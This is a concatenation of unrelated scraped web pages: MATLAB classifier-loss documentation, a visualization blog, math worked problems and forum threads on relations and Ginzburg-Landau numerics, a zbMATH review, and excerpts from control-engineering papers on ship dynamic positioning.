f(Xj) is the column vector of class posterior probabilities for the observation Xj. C is the cost matrix stored in the Cost property of the model.
2. For observation j, predict the class label corresponding to the minimal expected misclassification cost:
${\stackrel{^}{y}}_{j}=\underset{k=1,...,K}{\text{argmin}}{\gamma }_{jk}.$
3. Using C, identify the cost incurred (cj) for making the prediction.
The weighted average of the minimal expected misclassification cost loss is
$L=\sum _{j=1}^{n}{w}_{j}{c}_{j}.$
Quadratic loss'quadratic'$L=\sum _{j=1}^{n}{w}_{j}{\left(1-{m}_{j}\right)}^{2}.$
If you use the default cost matrix (whose element value is 0 for correct classification and 1 for incorrect classification), then the loss values for 'classifcost', 'classiferror', and 'mincost' are identical. For a model with a nondefault cost matrix, the 'classifcost' loss is equivalent to the 'mincost' loss most of the time. These losses can be different if prediction into the class with maximal posterior probability is different from prediction into the class with minimal expected cost. Note that 'mincost' is appropriate only if classification scores are posterior probabilities.
This figure compares the loss functions (except 'classifcost', 'crossentropy', and 'mincost') over the score m for one observation. Some functions are normalized to pass through the point (0,1).
True Misclassification Cost
Two costs are associated with KNN classification: the true misclassification cost per class and the expected misclassification cost per observation.
You can set the true misclassification cost per class by using the 'Cost' name-value pair argument when you run fitcknn. The value Cost(i,j) is the cost of classifying an observation into class j if its true class is i. By default, Cost(i,j) = 1 if i ~= j, and Cost(i,j) = 0 if i = j. In other words, the cost is 0 for correct classification and 1 for incorrect classification.
Expected Cost
Two costs are associated with KNN classification: the true misclassification cost per class and the expected misclassification cost per observation. The third output of predict is the expected misclassification cost per observation.
Suppose you have Nobs observations that you want to classify with a trained classifier mdl, and you have K classes. You place the observations into a matrix Xnew with one observation per row. The command
[label,score,cost] = predict(mdl,Xnew)
returns a matrix cost of size Nobs-by-K, among other outputs. Each row of the cost matrix contains the expected (average) cost of classifying the observation into each of the K classes. cost(n,j) is
$\sum _{i=1}^{K}\stackrel{^}{P}\left(i|Xnew\left(n\right)\right)C\left(j|i\right),$
where
• K is the number of classes.
• $\stackrel{^}{P}\left(i|X\left(n\right)\right)$ is the posterior probability of class i for observation Xnew(n).
• $C\left(j|i\right)$ is the true misclassification cost of classifying an observation as j when its true class is i.
Version History
Introduced in R2012a
expand all
|
|
Tango is a sad thought that is danced.think & dancemore quotes
# information graphics: worthwhile
The Outbreak Poems — artistic emissions in a pandemic
# Visual Design Principles—Communicating Effectively
This talk happened on Thursday, Mar 21st 2013 at VIZBI 2013 at the Broad Institute in Boston.
How often people speak of art and science as though they were two entirely different things, with no interconnection. An artist is emotional, they think, and uses only his intuition; he sees all at once and has no need of reason. A scientist is cold, they think, and uses only his reason; he argues carefully step by step, and needs no imagination. That is all wrong. The true artist is quite rational as well as imaginative and knows what he is doing; if he does not, his art suffers. The true scientist is quite imaginative as well as rational, and sometimes leaps to solutions where reason can follow only slowly; if he does not, his science suffers. —Isaac Asimov (The Roving Mind)
For more visualization and design resources, see my VIZBI 2012 tutorials, Nature Methods Points of View column, and rant about colors.
Do not allow encoding or other design choices to hijaack your message. Each element on the page must meaningfully contribute to your figure.
## presentation video
The video will be posted at vizbi.org.
## presentation slides
Slides are available as PDF and keynote (zipped).
1/144
A poet is, after all, a sort of scientist, but engaged in a qualitative science in which nothing is measurable. He lives with data that cannot be numbered, and his experiments can be done only once. The information in a poem is, by definition, not reproducible. He becomes an equivalent of scientist, in the act of examining and sorting the things popping in [to his head], finding the marks of remote similarity, points of distant relationship, tiny irregularities that indicate that this one is really the same as that one over there only more important. Gauging the fit, he can meticulously place pieces of the universe together, in geometric configurations that are as beautiful and balanced as crystals. —Lewis Thomas (The Medusa and the Snail: More Notes of a Biology Watcher)
## breakout session—making good figures
Sketch notes by the inimitable Francis Rowland from our breakout group. The question was: what do you need to make good figures? (PDF)
## small, medium and big data visualization
If you're asking how to visualize big data, first make sure you're doing a good job on small and medium data. Each scale requires good design.
Do not expect to use one way
to tell many stories
Also consider that there is a very large number of combinations of data sets, hypotheses and possible patterns. Because of this, you cannot expect to use one way to tell many stories. There is no Holy Grail of big data visualization. But there are many good questions to ask and practices to follow that make up a process which can help you get there.
Medium data visualization. This is what happens when you show the data (a strategy that works for small data), instead of explaining it. Yup, we need to work on this too. (A) Qi X et al. J Biotech 144:43 (2012) (Saturation-Mutagenesis in Two Positions Distant from Active Site of a Klebsiella pneumoniae Glycerol Dehydratase Identifies Some Highly Active Mutants) (B) Alekseyev, M.A. et al. Genome Res 19:943 (2009) (Breakpoint graphs and ancestral genome reconstructions)
Big data visualization. Yes, data sets are growing but are visual and cognitive abilities are not. There are many data sets, each requiring its own approach. You cannot use one way to tell many stories. Lewis SN et al. PLoS ONE 6:e27175 (2011) (Prediction of Disease and Phenotype Associations from Genome-Wide Association Studies)
# Virus Mutations Reveal How COVID-19 Really Spread
Mon 01-06-2020
Genetic sequences of the coronavirus tell story of when the virus arrived in each country and where it came from.
Our graphic in Scientific American's Graphic Science section in the June 2020 issue shows a phylogenetic tree based on a snapshot of the data model from Nextstrain as of 31 March 2020.
Virus Mutations Reveal How COVID-19 Really Spread. Text by Mark Fischetti (Senior Editor), art direction by Jen Christiansen (Senior Graphics Editor), source: Nextstrain (enabled by data from GISAID).
# Cover of Nature Cancer April 2020
Mon 27-04-2020
Our design on the cover of Nature Cancer's April 2020 issue shows mutation spectra of patients from the POG570 cohort of 570 individuals with advanced metastatic cancer.
Each ellipse system represents the mutation spectrum of an individual patient. Individual ellipses in the system correspond to the number of base changes in a given class and are layered by mutation count. Ellipse angle is controlled by the proportion of mutations in a class within the sample and its size is determined by a sigmoid mapping of mutation count scaled within the layer. The opacity of each system represents the duration since the diagnosis of advanced disease. (read more)
The cover design accompanies our report in the issue Pleasance, E., Titmuss, E., Williamson, L. et al. (2020) Pan-cancer analysis of advanced patient tumors reveals interactions between therapy and genomic landscapes. Nat Cancer 1:452–468.
# Modeling infectious epidemics
Wed 06-05-2020
Every day sadder and sadder news of its increase. In the City died this week 7496; and of them, 6102 of the plague. But it is feared that the true number of the dead this week is near 10,000 ....
—Samuel Pepys, 1665
This month, we begin a series of columns on epidemiological models. We start with the basic SIR model, which models the spread of an infection between three groups in a population: susceptible, infected and recovered.
Nature Methods Points of Significance column: Modeling infectious epidemics. (read)
We discuss conditions under which an outbreak occurs, estimates of spread characteristics and the effects that mitigation can play on disease trajectories. We show the trends that arise when "flattenting the curve" by decreasing $R_0$.
Nature Methods Points of Significance column: Modeling infectious epidemics. (read)
This column has an interactive supplemental component that allows you to explore how the model curves change with parameters such as infectious period, basic reproduction number and vaccination level.
Nature Methods Points of Significance column: Modeling infectious epidemics. (Interactive supplemental materials)
Bjørnstad, O.N., Shea, K., Krzywinski, M. & Altman, N. (2020) Points of significance: Modeling infectious epidemics. Nature Methods 17:455–456.
# The Outbreak Poems
Sat 04-04-2020
I'm writing poetry daily to put my feelings into words more often during the COVID-19 outbreak.
$That moment when you know a moment.$
$Branch to branch, flit, look everywhere, chirp.$
$Memory, scent of thought fleeting.$
$Distant pasts all ways in plural form.$
|
|
# A Sum Of Money Invested At 8% Per Annum For Simple Interest Amounts To Rs 12122 In 2 Years. What Will It Amounts To In 2 Year 8 Months At 9% Rate Of Interest?
Given:
Amount = Rs 12122
Time period, t = 2 years
Rate of interest, r = 8%
Amount = Principal + Interest
$$\Rightarrow 12122 = P + \frac{PTR}{100}$$ $$\Rightarrow 12122 = \frac{100P + PTR}{100}$$ $$\Rightarrow 12122 = \frac{P(100 + TR)}{100}$$ $$\Rightarrow 12122 = \frac{P(100 + 2 * 8)}{100}$$ $$\Rightarrow 12122 = \frac{P(100 + 16)}{100}$$ $$\Rightarrow P = \frac{P116}{100}$$ $$\Rightarrow P = 12122 * \frac{100}{116}$$
Therefore,Principal (P) = Rs 10450.
Amount in two years eight months (32 months) and the rate of interest, r = 9% per annum.
Amount = Principal + Interest
$$\Rightarrow A = P + \frac{PTR}{100}$$
Since two years eight months (32 months) =$$\frac{8}{3} years$$ $$\Rightarrow A = 10450 + \frac{10450 * \frac{8}{3} * 9}{100}$$ $$\Rightarrow A = 10450 + \frac{250800}{100}$$ $$\Rightarrow A = 10450 + 2508$$ $$\Rightarrow A = 12958$$
Therefore, Amount, A = Rs.12958
Explore more such questions and answers at BYJU’S.
|
|
# Height of a regular hexagonal prism Calculator
## Calculates the height of a regular hexagonal prism given the volume and base edge length.
base edge length a volume V 6digit10digit14digit18digit22digit26digit30digit34digit38digit42digit46digit50digit height h
Height of a regular hexagonal prism
[0-0] / 0 Disp-Num5103050100200
The message is not registered.
Sending completion
To improve this 'Height of a regular hexagonal prism Calculator', please fill in questionnaire.
Male or Female ?
Age
Occupation
Useful?
Purpose of use?
|
|
Bibliotek
Musik » Fever Ray »
27 spelade låtar | Gå till låtsida
Låtar (27)
Låt Album Längd Datum
If I Had a Heart 3:49 29 mar 2012, 15:15
If I Had a Heart 3:49 22 mar 2012, 15:02
If I Had a Heart 3:49 17 mar 2012, 20:20
If I Had a Heart 3:49 17 mar 2012, 19:31
If I Had a Heart 3:49 17 mar 2012, 18:43
If I Had a Heart 3:49 17 mar 2012, 17:55
If I Had a Heart 3:49 17 mar 2012, 17:07
If I Had a Heart 3:49 13 mar 2012, 17:28
If I Had a Heart 3:49 11 mar 2012, 15:39
If I Had a Heart 3:49 11 mar 2012, 13:03
If I Had a Heart 3:49 11 mar 2012, 12:15
If I Had a Heart 3:49 11 mar 2012, 10:57
If I Had a Heart 3:49 11 mar 2012, 10:53
If I Had a Heart 3:49 8 mar 2012, 21:54
If I Had a Heart 3:49 8 mar 2012, 21:50
If I Had a Heart 3:49 8 mar 2012, 21:46
If I Had a Heart 3:49 8 mar 2012, 21:42
If I Had a Heart 3:49 8 mar 2012, 21:38
If I Had a Heart 3:49 8 mar 2012, 21:35
If I Had a Heart 3:49 8 mar 2012, 21:31
If I Had a Heart 3:49 8 mar 2012, 21:27
If I Had a Heart 3:49 8 mar 2012, 16:38
If I Had a Heart 3:49 8 mar 2012, 16:34
If I Had a Heart 3:49 8 mar 2012, 16:30
If I Had a Heart 3:49 21 sep 2011, 10:40
If I Had a Heart 3:49 21 sep 2011, 09:18
If I Had a Heart 3:49 20 sep 2011, 20:04
|
|
# Math Help - Relations Question
1. ## Relations Question
Let A be the set {a, b, c, d, e, 1, 2, 3, 4, 5, x, y, z, w}
How many different reflexive relations are there and how many different symmetric relations are there? I know the total would be 2^196 because of the power set rule but how can I figure out how many reflexive and symmetric relations there are?
2. Originally Posted by dre
Let A be the set {a, b, c, d, e, 1, 2, 3, 4, 5, x, y, z, w}
How many different reflexive relations are there and how many different symmetric relations are there?
The set of pairs $\Delta _A = \left\{ {\left( {\alpha ,\alpha } \right):\alpha \in A} \right\}$ is known a the diagonal from the table of ordered pairs.
There are $14^2$ pairs in that table so $\left| {\Delta _A } \right| = 14$
Therefore there are $14^2-14$ off diagonal pairs.
Any reflexive relation on $A$ must contain ${\Delta _A }$.
So any reflexive relation is the union of ${\Delta _A }$ with any subset of off diagonal pairs.
How many of those are there?
Any symmetric relation on $A$, $\mathcal{S}$, has the property that $\mathcal{S}=\mathcal{S}^{-1}$.
There are $\frac{(14)(15)}{2}$ pairs either on the diagonal or above it.
Any subset of those pairs corresponds to a symmetric relation.
Just take that subset and unite it with its inverse.
How many are there?
3. Originally Posted by Plato
The set of pairs $\Delta _A = \left\{ {\left( {\alpha ,\alpha } \right):\alpha \in A} \right\}$ is known a the diagonal from the table of ordered pairs.
There are $14^2$ pairs in that table so $\left| {\Delta _A } \right| = 14$
Therefore there are $14^2-14$ off diagonal pairs.
Any reflexive relation on $A$ must contain ${\Delta _A }$.
So any reflexive relation is the union of ${\Delta _A }$ with any subset of off diagonal pairs.
How many of those are there?
Any symmetric relation on $A$, $\mathcal{S}$, has the property that $\mathcal{S}=\mathcal{S}^{-1}$.
There are $\frac{(14)(15)}{2}$ pairs either on the diagonal or above it.
Any subset of those pairs corresponds to a symmetric relation.
Just take that subset and unite it with its inverse.
How many are there?
Thank you for this explanation, but I am still confused about something in ROSEN: I understand that the number of subsets from A with n elements is $2^n$, I can see that the diagonal of the cartesian product will contain n elements and that all other elements will total $n^2$ - n. But I don't see why the number of reflexive relations equal $2^q$ where q = $n^2$ - n ? Why isn't the number of reflexive relations just equal to $2^r$ where r = $n^2$?
Thanks
4. Originally Posted by oldguynewstudent
Thank you for this explanation, but I am still confused about something in ROSEN: I understand that the number of subsets from A with n elements is $2^n$, I can see that the diagonal of the cartesian product will contain n elements and that all other elements will total $n^2$ - n. But I don't see why the number of reflexive relations equal $2^q$ where q = $n^2$ - n ? Why isn't the number of reflexive relations just equal to $2^r$ where r = $n^2$?
If you will give me the exact reference in Rosen's book I will look at it.
As for your other concern, if $|A|=n$ then how many subsets of $A\times A$ contain $\Delta_A$?
Do you understand that $\left|(A\times A)\setminus \Delta_A\right|=n^2-n?$
How many subsets of $A\times A\setminus \Delta_A$ are there?
Uniting any of those with $\Delta_A$ we get a reflexive relation on $A$
5. ## I think I get it now
Originally Posted by Plato
If you will give me the exact reference in Rosen's book I will look at it.
As for your other concern, if $|A|=n$ then how many subsets of $A\times A$ contain $\Delta_A$?
Do you understand that $\left|(A\times A)\setminus \Delta_A\right|=n^2-n?$
How many subsets of $A\times A\setminus \Delta_A$ are there?
Uniting any of those with $\Delta_A$ we get a reflexive relation on $A$
Thanks for your patience. We skipped the combinatorics chapters. The reference is on p 525 6th edition, example 16. So because there are n members in the diagonal we have by the product rule these n combined with the n - 1 other (rows or columns in the matrix) to give n(n - 1) ways to combine. Then we raise 2 to that power to get the number of relations.
I still have to think it over further to solidify the concept. But at least now I can follow the reasoning.
Happy Holidays!
|
|
# zbMATH — the first resource for mathematics
##### Examples
Geometry Search for the term Geometry in any field. Queries are case-independent. Funct* Wildcard queries are specified by * (e.g. functions, functorial, etc.). Otherwise the search is exact. "Topological group" Phrases (multi-words) should be set in "straight quotation marks". au: Bourbaki & ti: Algebra Search for author and title. The and-operator & is default and can be omitted. Chebyshev | Tschebyscheff The or-operator | allows to search for Chebyshev or Tschebyscheff. "Quasi* map*" py: 1989 The resulting documents have publication year 1989. so: Eur* J* Mat* Soc* cc: 14 Search for publications in a particular source with a Mathematics Subject Classification code (cc) in 14. "Partial diff* eq*" ! elliptic The not-operator ! eliminates all results containing the word elliptic. dt: b & au: Hilbert The document type is set to books; alternatively: j for journal articles, a for book articles. py: 2000-2015 cc: (94A | 11T) Number ranges are accepted. Terms can be grouped within (parentheses). la: chinese Find documents in a given language. ISO 639-1 language codes can also be used.
##### Operators
a & b logic and a | b logic or !ab logic not abc* right wildcard "ab c" phrase (ab c) parentheses
##### Fields
any anywhere an internal document identifier au author, editor ai internal author identifier ti title la language so source ab review, abstract py publication year rv reviewer cc MSC code ut uncontrolled term dt document type (j: journal article; b: book; a: book article)
Enumerative geometry for complex geodesics on quasi-hyperbolic 4-spaces with cusps. (English) Zbl 1053.14060
Mladenov, Ivaïlo M. (ed.) et al., Proceedings of the 4th international conference on geometry, integrability and quantization, Sts. Constantine and Elena, Bulgaria, June 6–15, 2002. Sofia: Coral Press Scientific Publishing (ISBN 954-90618-4-1/pbk). 42-87 (2003).
An orbital surface $\stackrel{^}{𝕏}=\left(\stackrel{^}{X},{\stackrel{^}{B}}^{1}\right)$ is a complex normal algebraic surface $\stackrel{^}{X}$ with at most quotient and cusp singularities together with an orbital Weil divisor ${\stackrel{^}{B}}^{1}$. Orbital functionals can be defined simultaneously for each commensurability class of orbital surfaces, and they are realized on infinite-dimensional orbital divisor spaces spanned by orbital curves on an orbital surface. In this paper the author finds infinitely many orbital functionals on each commensurability class of orbital Picard surfaces, which are real 4-spaces with cusps and negative constant Kähler-Einstein metric degenerated along an orbital cycle. For a suitable Heegner sequence $\left(\int {h}_{N}\right)$ of such functionals he studies the the corresponding formal orbital $q$-series ${\sum }_{N=0}^{\infty }\left(\int {h}_{N}\right){q}^{N}$. After substitution $q={e}^{2\pi i\tau }$ and the application to arithmetic orbital curves $\stackrel{^}{𝕐}$ on a fixed Picard surface class, the author proves that the series ${\sum }_{N=0}^{\infty }\left({\int }_{\stackrel{^}{𝕐}}{h}_{N}\right){e}^{2\pi iN\tau }$ defines modular forms of well-determined fixed weight, level and Nebentypus. The proof uses the notion of orbital heights and Mumford-Fulton’s rational intersection theory on singular surfaces in the Riemann-Roch-Hirzebruch style.
##### MSC:
14N20 Configurations and arrangements of linear subspaces 11F55 Groups and their modular and automorphic forms (several variables)
##### Keywords:
orbital curves; orbital surfaces; modular forms
|
|
# Numerical Solution for Complex PDE (Ginzburg-Landau Eqn.)
• A
I cant seem to figure out how to edit the post :/. Here is a pic of the error I get
http://tinypic.com/r/25tjkm1/9
Strum, without knowing the exact 9-point stencil you used I tried to replicate the plot you produced (in Matlab I assume?). Apparently, there is no standard for the 9-point kernel although there is some consensus on the 5-point kernel. Different formulations of the finite difference formulae will yield differing kernels. So when I use a 9 point kernel, I obtain the following for the same domain and $\Delta x = \Delta y = h = 0.1$
It seems like I get a very small $|\epsilon|^2$By the way, the reason I am insisting on using convolution is purely for computational reasons: it can be done in hardware (ie. GPU). It seems like we both have comparable rates. The 5-point stencil yields the following result:
Notice that there are some artefacts that appear about one of the "color rings" in the last errror plot. Were you using another method other than convolution?
Twigg
Gold Member
First off, I want to say thanks to Johnny_Sparx for taking the time to make this a great thread. I've learned a lot from it and enjoyed reading every new post.
I needed to take some time to think about this whole thing. The convolution method I was working with has a spectral response. By this I mean mean the finite boundary extents should yield oscillations at the extents, and these are related to the spatial step size. When I initialize my array with uniformly random values (from the complex unit square with length less than or equal to one), relative to one another, these are all 2D step functions. For example, for an arbitrary array location (i,j) assume I have a random value of 1+0j. Adjacent to it, say at (i+1,j-1) there may be a value of 0+0j. This is a sharp discontinuity whose second derivative is quite large.
For a sufficiently large initialization array with values that are locally discontinuous the Laplacian can yield large values, especially the way I am iterating for the Runge-Kutta algorithm... repeatedly calling the Laplacian operator. I am just throwing ideas around... what do you think?
I may be missing something, but I don't see how the oscillations at the extents are related to the error in the Laplacian due to large differences divided by small step sizes. There is a way you could test to see if these differences are what's giving you the overflow. Go into your initialization code where you sample random points from the complex unit square and make the radius of the complex square a variable, not necessarily 1. For clarity, let's call the size of the complex square that the initial values are sampled from g, and let's call the stepsize h. Write a for loop to run your simulation for several values of g and h. My instinct would be to have it do orders of magnitude. For example, the loop would start with h = 1.0E-03 and g = 1.0E-03 and run your simulation, then do h = 1.0E-03 and g = 1.0E-02, etc., then h = 1.0E-3 and g = 1.0E3, then h = 1.0E-02 and g = 1.0E-03, etc etc. If you are right and the issue is entirely due to large differences in the Laplacian, then the overflow error will only depend on g/h. If you plot the overflow error over the gh-plane, the resulting surface plot should be independent of the radial coordinate and depend only on the angular coordinate (on average, at least, since the initialization is randomized). If that's not the case, I would venture to say that something else is up. This may take a lot of computing time.
I maybe should've asked a little earlier, but can you tell us what you're using as boundary conditions, and how you tell the kernel to behave on those boundaries? For example, on the edges are you using a 4-point stencil or is there some contribution from outside? I can't tell if the errors you're seeing are related to boundaries or not. Hopefully the above test helps narrow it down.
First off, I want to say thanks to Johnny_Sparx for taking the time to make this a great thread. I've learned a lot from it and enjoyed reading every new post.
Truth be known, in my personal circles, I have been talking about the direction both you and Strum have helped me with. I just posted, you both replied. And I too have been learning a lot of things. Lots of deep insight in this thread. Thought provoking stuff!
I may be missing something, but I don't see how the oscillations at the extents are related to the error in the Laplacian due to large differences divided by small step sizes.
My inspiration for saying this extends from the following idea:
Consider a unit step function $f(t)$ (ie. Heaviside function with one dimensional discontinuity). The 1D laplacian of this function is essentially the second derivative $\frac{\partial^2}{\partial t^2}f(t)$. This is the doublet function, a double sided, unit impulse (FYI, the Kroniker delta function is a discrete version of the Dirac function and the doublet is its derivative). In the frequency domain these impulses have an infinitely wideband spectrum (constant in the frequency domain). Discretely sampling an infinitely wideband signal essentially filters it. To me, derivatives at crisp boundaries creates time domain oscillations that are band-limited by the sampling frequency. That's why when we look at simulations involving Laplacians or gradients over time, amplitude changes are typically initiated at boundaries that are sharp and have wave-like patterns.
I just wanted to express motivations for my comment, thanks for calling me to task for this. It helped me clarify my thoughts on the matter.
There is a way you could test to see if these differences are what's giving you the overflow. Go into your initialization code where you sample random points from the complex unit square and make the radius of the complex square a variable, not necessarily 1. For clarity, let's call the size of the complex square that the initial values are sampled from g, and let's call the stepsize h. Write a for loop to run your simulation for several values of g and h. My instinct would be to have it do orders of magnitude. For example, the loop would start with h = 1.0E-03 and g = 1.0E-03 and run your simulation, then do h = 1.0E-03 and g = 1.0E-02, etc., then h = 1.0E-3 and g = 1.0E3, then h = 1.0E-02 and g = 1.0E-03, etc etc. If you are right and the issue is entirely due to large differences in the Laplacian, then the overflow error will only depend on g/h. If you plot the overflow error over the gh-plane, the resulting surface plot should be independent of the radial coordinate and depend only on the angular coordinate (on average, at least, since the initialization is randomized). If that's not the case, I would venture to say that something else is up. This may take a lot of computing time.
This might take some time to do which I don't think I have. What I did do was to test the Laplacian I implemented with a function that did not vanish at the borders. In other words, I used the same function, but biased it by 1 and computed the Laplacian with 0 as fill values at the border. Essentially this forms a crisp edge. The function used was:$$f(x,y) = {{\rm e}^{-{x}^{2}-{y}^{2}}}+1$$ Note the last term. The analytic Laplacian was found to be:$$\nabla^2 f = -4\,{{\rm e}^{-{x}^{2}-{y}^{2}}}+4\,{x}^{2}{{\rm e}^{-{x}^{2}-{y}^{2}}}+4\,{y}^{2}{{\rm e}^{-{x}^{2}-{y}^{2}}}$$
The 9-point stencil was convolved over the discretized function ($-6 \leq x,y\leq 6, h=0.1$). The convolutional function was called with fill values of 0 at the boundaries. The result:
And look at those errors! 6 orders of magnitude greater than the previous test result I posted. It seems the convolutional method does not respect boundaries as expected. Next experiment. Convolution using a "wrap" at the end of both axes, ie, the domain is a torus. This continuous domain yields (for the same function):
And now look at the boundary. My conclusion seems to be converging to:
In computing a discrete Laplacian, it seems convolution with a 5/9 point stencil (or any other) works on continuous boundaries - not on discrete ones, despite what fill values you insert at the boundaries.
I maybe should've asked a little earlier, but can you tell us what you're using as boundary conditions, and how you tell the kernel to behave on those boundaries? For example, on the edges are you using a 4-point stencil or is there some contribution from outside? I can't tell if the errors you're seeing are related to boundaries or not. Hopefully the above test helps narrow it down.
At the boundary, I need for the order parameter to be zero, ie $\psi=0$ at the boundaries. What is the name of a method I can use that does not employ convolution to enforce these boundaries? I know we mentioned the use of sparse matrices... is there a name for this method so that I can look it up?
Were you using another method other than convolution?
I used a simple 5 or 9 point finite difference stensil.
You result in #28 is to be expected since you are differentiating a function given by ## f(x,y) = e^{-(x^2 + y^2)} + 1 ##, in the interior and ## f(x,u) = 0 ## on the boundary. That will generate problems. This however, is not the situation you will be in when doing your simulation, where the G-L field will find a natural solution with ## \psi = 0 ## on the boundary.
In computing a discrete Laplacian, it seems convolution with a 5/9 point stencil (or any other) works on continuous boundaries - not on discrete ones, despite what fill values you insert at the boundaries.
I am not entirely certain I understand what you are saying but I am suspecting it does not make sense. There is no problem specifying Dirichlet boundary conditions using all sorts of different numerical methods.
At the boundary, I need for the order parameter to be zero, ie ## \psi=0 ## at the boundaries. What is the name of a method I can use that does not employ convolution to enforce these boundaries? I know we mentioned the use of sparse matrices... is there a name for this method so that I can look it up?
Perhaps you should try and use a finite difference method. See for example these slides: http://people.sc.fsu.edu/~jpeterson/notes_fd.pdf . In order to enforce your boundary conditions you extend the lattice with a boundary layer with a specific value( in your case ## 0 ## ), which you do not update. This is shown on slide 16. On slide 18 the differentiation matrix for a finite difference method is shown. As you can see it is sparse.
Twigg
Gold Member
Finite difference is the method I was thinking of. Specifically, a central-difference scheme for the Laplacian. The catch is that your problem is non-linear due to the ##|\psi|^{2} \psi## term. You will need to use Newton's method to get a solution, and that opens a new can of worms with convergence and validation. I've never tried this personally, but I know at least one piece of commercial software (COMSOL) that uses Newton's method to solve the matrix problems of finite element methods.
Is there a way to adapt your existing code to initialize the order parameter on the boundaries to 0 and then tell the convolutional kernel to act on everything but the outermost cells? That might make a lot more sense if you already have a method that works. For example, if your initial data was [0, 0, 0, 0; 0, 0.3+0.5i, 0.5-0.2i,0;0,0,0,0], then you would tell the convolutional kernel only to operate on the inner two entries and not act on the boundary zeros. Is that possible? Just a thought.
Finite difference is the method I was thinking of. Specifically, a central-difference scheme for the Laplacian. The catch is that your problem is non-linear due to the |ψ|2ψ|\psi|^{2} \psi term. You will need to use Newton's method to get a solution, and that opens a new can of worms with convergence and validation. I've never tried this personally, but I know at least one piece of commercial software (COMSOL) that uses Newton's method to solve the matrix problems of finite element methods.
Why would you think there is a problem with non-linear terms? I really can not see how this should pose a problem as long as he uses some explicit time integration scheme ( and even if he used an implicit I can not see why the difficulties would even be related to the finite difference method ).
Twigg
Gold Member
Why would you think there is a problem with non-linear terms? I really can not see how this should pose a problem as long as he uses some explicit time integration scheme ( and even if he used an implicit I can not see why the difficulties would even be related to the finite difference method ).
You're absolutely right, my mistake. I was thinking of a steady-state problem, which this is not.
|
|
# 59617
## Автор(ов):
2
Параметры публикации
Доклад
## Название:
G-entropy Analysis of LTI Continuous-Time Systems with Stochastic External Disturbance in Time Domain
Да
## ISBN/ISSN:
978-1-7281-9809-5
## DOI:
10.1109/ICSTCC50638.2020.9259630
## Наименование конференции:
• 24th International Conference on System Theory, Control and Computing (ICSTCC 2020)
## Наименование источника:
• Proceedings 2020 24th International Conference on System Theory, Control and Computing (ICSTCC 2020)
## Город:
• New York, NY, USA
• IEEE
2020
## Страницы:
184-189 https://ieeexplore.ieee.org/document/9259630
Аннотация
This paper deals with disturbance attenuation capabilities of continuous linear time-invariant systems with respect to stochastic input disturbance with bounded 2 or power norm (for generality called N norm). A set of the input disturbances is bounded by the scalar parameter s which is determined by entropy integral and called σ-entropy. This set is connected with system bandwidth at low frequencies. S-entropy norm of the continuous linear system can be defined as a supremum ratio between N norms of the system’s output and input signals. It characterizes system gain of the stochastic input disturbance. In the paper a state-space solution to σ-entropy norm calculation is given.
## Библиографическая ссылка:
Белов А.А., Бойченко В.А. G-entropy Analysis of LTI Continuous-Time Systems with Stochastic External Disturbance in Time Domain / Proceedings 2020 24th International Conference on System Theory, Control and Computing (ICSTCC 2020). New York, NY, USA: IEEE, 2020. С. 184-189 https://ieeexplore.ieee.org/document/9259630 .
|
|
舰船科学技术 2017, Vol. 39 Issue (2): 103-107 PDF
Back-stepping sliding mode control of ship dynamic positioning system based on extended state observer
JIN Yue, YU Meng-hong, YUAN Wei, FAN Ji-sheng
School of Electronic and Information, Jiangsu University of Science and Technology, Zhenjiang 212003, China
Abstract: Aiming at the ship dynamic positioning control system in the offshore platform, In view of the advantages of back-stepping sliding mode control and extended observer, a sliding mode control method for dynamic positioning of ship based on extended observer is proposed. Considering the system of unknown external disturbances and parameters of ship model uncertainty, the system is divided as the observer of the inner ring and the outer ring controller. First, using the extended state observer to estimate the unknown state and uncertainty of the system which are compensated in the outer ring of the back-stepping sliding mode control then, finally Lyapunov method is used to demonstrate the system's stability. The ship point control simulation experiment shows that back-stepping sliding mode controller based on extended state observer with strong robustness and control performance can make the ship's surge position, sway position and swing angle gradually keep in the expected value. It can effectively suppress the chattering problem in the conventional sliding mode control and is beneficial to the application of ship engineering.
Key words: dynamic positioning control extended state observer back-stepping sliding mode control
0 引言
1 船舶数学模型
图 1 大地坐标系和船体坐标系 Fig. 1 Geodetic coordinate system and ship coordinate system
$\left\{ \begin{array}{l} \dot \eta = R\left( \psi \right)v \text{,}\\ M\dot \nu+D\nu = {R^{\rm T}}(\psi )b+\tau \text{。} \end{array} \right.$ (1)
$\begin{array}{l} { R}(\psi ) = \left[ {\begin{array}{*{20}{l}} {\cos \psi } & { - \sin \psi } & 0\\ {\sin \psi } & {\cos \psi } & 0\\ 0 & 0 & 1 \end{array}} \right]\text{,}\\ { M} = \left[ {\begin{array}{*{20}{c}} {m - {X_{\dot u}}} & 0 & 0\\ 0 & {m - {Y_{\dot v}}} & {m{x_g} - {Y_{\dot r}}}\\ 0 & {m{x_g} - {N_{\dot v}}} & {{I_z} - {N_{\dot r}}} \end{array}} \right]\text{,}\\ { D} = \left[ {\begin{array}{*{20}{c}} { - {X_u}} & 0 & 0\\ 0 & { - {Y_v}} & { - {Y_r}}\\ 0 & { - {N_v}} & { - {N_r}} \end{array}} \right]\text{。} \end{array}$
2 基于扩张观测器的反演滑模变结构控制系统的设计
2.1 扩张观测器的设计
$\left\{ \begin{array}{l} {x^{\left( n \right)}} = f\left( {x,{x^{\left( 1 \right)}}, \cdots ,{x^{\left( {n - 1} \right)}},t} \right)+w\left( t \right)+bu \text{,}\\ y = x\left( t \right)\text{。} \end{array} \right.$ (2)
$a\left( t \right) = f\left( {x,{x^{\left( 1 \right)}}, \cdots ,{x^{\left( {n - 1} \right)}},t} \right)+w\left( t \right)$,则n+1 阶 ESO 的一般形式为:
$\left\{ \begin{array}{l} {{\dot z}_1} = {z_2} - {g_1}\left( {{z_1} - x\left( t \right)} \right)\text{,}\\ \vdots \\ {{\dot z}_n} = {z_{n+1}} - {g_n}\left( {{z_1} - x\left( t \right)} \right)+bu \text{,}\\ {{\dot z}_{n+1}} = - {g_{n+1}}\left( {{z_1} - x\left( t \right)} \right)\text{。} \end{array} \right.$ (3)
$\begin{array}{l} fal\left( {\varepsilon ,\alpha ,\delta } \right) = \left\{ \begin{array}{l} {\left| \varepsilon \right|^\alpha }sat\left( \varepsilon \right),\left| \varepsilon \right| > \delta \text{,}\\ sign\left( \varepsilon \right),\varepsilon \leqslant \delta \text{,} \end{array} \right.\\ sat\left( \varepsilon \right) = \left\{ \begin{array}{l} \varepsilon /\varsigma ,\left| \varepsilon \right| \leqslant \varsigma \text{,}\\ sign\left( \varepsilon \right),\left| \varepsilon \right| > \varsigma \text{。} \end{array} \right. \end{array}$ (4)
